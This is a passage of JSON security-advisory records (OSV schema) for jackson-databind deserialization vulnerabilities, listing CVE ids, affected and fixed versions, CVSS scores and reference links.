"https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.10.1...jackson-databind-2.9.10.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r107c8737db39ec9ec4f4e7147b249e29be79170b9ef4b80528105a2d@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2c77dd6ab8344285bd8e481b57cf3029965a4b0036eefccef74cdd44@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r392099ed2757ff2e383b10440594e914d080511d7da1c8fed0612c1f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3f8180d0d25a7c6473ebb9714b0c1d19a73f455ae70d0c5fefc17e6c@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r428735963bee7cb99877b88d3228e28ec28af64646455c4f3e7a3c94@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r50f513772f12e1babf65c7c2b9c16425bac2d945351879e2e267517f@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5c14fdcabdeaba258857bcb67198652e4dce1d33ddc590cd81d82393@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5c3644c97f0434d1ceb48ff48897a67bdbf3baf7efbe7d04625425b3@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5d3d10fdf28110da3f9ac1b7d08d7e252f98d7d37ce0a6bd139a2e4f@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67f4d4c48197454b83d62afbed8bebbda3764e6e3a6e26a848961764@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r707d23bb9ee245f50aa909add0da6e8d8f24719b1278ddd99d2428b2@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7a0821b44247a1e6c6fe5f2943b90ebc4f80a8d1fb0aa9a8b29a59a2@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7fb123e7dad49af5886cfec7135c0fd5b74e4c67af029e1dc91ba744@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8831b7fa5ca87a1cf23ee08d6dedb7877a964c1d2bd869af24056a63@%3Ccommits.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-02-25T02:46:33Z", "nvd_published_at": "2020-01-03T04:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h3cw-g4mq-c5x2", "published": "2021-12-09T19:14:51Z", "modified": "2024-02-18T05:30:45.329621Z", "aliases": [ "CVE-2020-24616" ], "summary": "Code Injection in jackson-databind", "details": "This project contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.6" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.5", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-h3cw-g4mq-c5x2/GHSA-h3cw-g4mq-c5x2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24616" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2814" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3d97153944f7de9c19c1b3637b33d3cf1fbbe4d7" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200904-0006" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502", "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2021-04-27T17:38:11Z", "nvd_published_at": "2020-08-25T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h4rc-386g-6m85", "published": "2020-04-23T20:19:02Z", "modified": "2024-03-15T00:46:40.266775Z", "aliases": [ "CVE-2020-11620" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-h4rc-386g-6m85/GHSA-h4rc-386g-6m85.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11620" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2682" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/77040d85e3eb6710508e6445640ae1a3d5e60c22" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200511-0004" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-22T21:17:03Z", "nvd_published_at": "2020-04-07T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h592-38cm-4ggp", "published": "2018-10-18T17:42:34Z", "modified": "2024-03-15T01:16:50.905794Z", "aliases": [ "CVE-2017-15095" ], "summary": "jackson-databind vulnerable to deserialization flaw leading to unauthenticated remote code execution", "details": "jackson-databind in versions prior to 2.8.11 and 2.9.4 contain a deserialization flaw which allows an unauthenticated user to perform code execution by sending maliciously crafted input to the readValue method of the ObjectMapper. This issue extends the previous flaw CVE-2017-7525, blacklisting additonal vulnerable classes.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-h592-38cm-4ggp/GHSA-h592-38cm-4ggp.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-h592-38cm-4ggp/GHSA-h592-38cm-4ggp.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-h592-38cm-4ggp/GHSA-h592-38cm-4ggp.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.2" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-h592-38cm-4ggp/GHSA-h592-38cm-4ggp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15095" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/1680" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/1737" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/a054585e2175ad0882f07bcafedecfac86230f1b" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/a3939d36edcc755c8af55bdc1969e0fa8438f9db" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/ddfddfba6414adbecaff99684ef66eebd3a92e92" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/e865a7a4464da63ded9f4b1a2328ad85c9ded78b" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1aac9b82eee907e0f0c3abbdea723a935" }, { "type": "WEB", "url": "https://github.com/tolbertam/jackson-databind/commit/80566a0f96b2003863f9d8f9ccc3b562001e147b" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3189" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f095a791bda6c0595f691eddd0febb2d396987eec5cbd29120d8c629@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00037.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20171214-0003" }, { "type": "WEB", "url": "https://web.archive.org/web/20200401000000*/http://www.securityfocus.com/bid/103880" }, { "type": "WEB", "url": "https://web.archive.org/web/20201221192044/http://www.securitytracker.com/id/1039769" }, { "type": "WEB", "url": "https://www.debian.org/security/2017/dsa-4037" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3190" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0342" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0478" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0479" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0480" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0481" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0576" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0577" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1447" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1448" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1449" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1450" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1451" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [ "CWE-184", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:38:56Z", "nvd_published_at": "2018-02-06T15:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h822-r4r5-v8jg", "published": "2019-09-23T18:33:25Z", "modified": "2024-07-15T22:00:19.609618Z", "aliases": [ "CVE-2019-14540" ], "related": [ "CGA-2vh6-9p6m-f98h" ], "summary": "Polymorphic Typing issue in FasterXML jackson-databind", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10, 2.8.11.5, and 2.6.7.3. It is related to `com.zaxxer.hikari.HikariConfig`.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/09/GHSA-h822-r4r5-v8jg/GHSA-h822-r4r5-v8jg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/09/GHSA-h822-r4r5-v8jg/GHSA-h822-r4r5-v8jg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/09/GHSA-h822-r4r5-v8jg/GHSA-h822-r4r5-v8jg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14540" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2410" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2449" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8aaf4ee16bbaf6204731d4770d96ebb34b258cd79b491f9cdd7f2540@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00001.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q7CANA7KV53JROZDX5Z5P26UG5VN2K43" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TH5VFUN4P7CCIP7KSEXYA5MUTFCUDUJT" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Oct/6" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20191004-0002" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4542" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0159" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0160" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0161" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0164" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0445" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/blob/master/release-notes/VERSION-2.x" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0fcef7321095ce0bc597d468d150cff3d647f4cb3aef3bd4d20e1c69@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/40c00861b53bb611dee7d6f35f864aa7d1c1bd77df28db597cbf27e1@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a360b46061c91c5cad789b6c3190aef9b9f223a2b75c9c9f046fe016@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a4f2c9fb36642a48912cdec6836ec00e497427717c5d377f8d7ccce6@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ad0d238e97a7da5eca47a014f0f7e81f440ed6bf74a93183825e18b9@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dc6b5cad721a4f6b3b62ed1163894941140d9d5656140fb757505ca0@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e90c3feb21702e68a8c08afce37045adb3870f2bf8223fa403fb93fb@%3Ccommits.hbase.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-09-19T09:23:48Z", "nvd_published_at": "2019-09-15T22:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-j823-4qch-3rgm", "published": "2020-06-18T14:44:46Z", "modified": "2024-03-15T00:46:13.294633Z", "aliases": [ "CVE-2020-14060" ], "summary": "Deserialization of untrusted data in Jackson Databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.5" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-j823-4qch-3rgm/GHSA-j823-4qch-3rgm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14060" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2688" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/ac7232e3f9004bdb4f11dcb5bc6c1fadf074f5f7" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": 